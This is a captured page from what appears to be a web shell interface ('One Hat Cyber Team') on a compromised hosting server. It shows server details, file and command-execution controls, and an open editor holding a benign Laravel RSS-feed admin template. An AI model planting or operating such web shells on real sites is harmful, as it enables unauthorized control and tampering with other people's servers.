⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.140
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
smarbgfw
/
www
/
core
/
resources
/
views
/
admin
/
rss
/
Edit File: feed.blade.php
@extends('admin.layout') @php $selLang = \App\Language::where('code', request()->input('language'))->first(); @endphp @if(!empty($selLang) && $selLang->rtl == 1) @section('styles') @endsection @endif @section('content')
RSS Feeds
RSS Feeds
RSS Feeds
RSS Feeds
@if (!empty($langs))
Select a Language
@foreach ($langs as $lang)
code == request()->input('language') ? 'selected' : ''}}>{{$lang->name}}
@endforeach
@endif
Import RSS Feed
@if (count($feeds) == 0)
NO FEED FOUND
@else
Language Name
Feed Name
Feed Url
Actions
@foreach ($feeds as $key => $feed)
{{convertUtf8($feed->language->name)}}
{{convertUtf8($feed->feed_name)}}
{{convertUtf8($feed->feed_url)}}
Edit
@csrf
Delete
@endforeach
@endif
@endsection
Simpan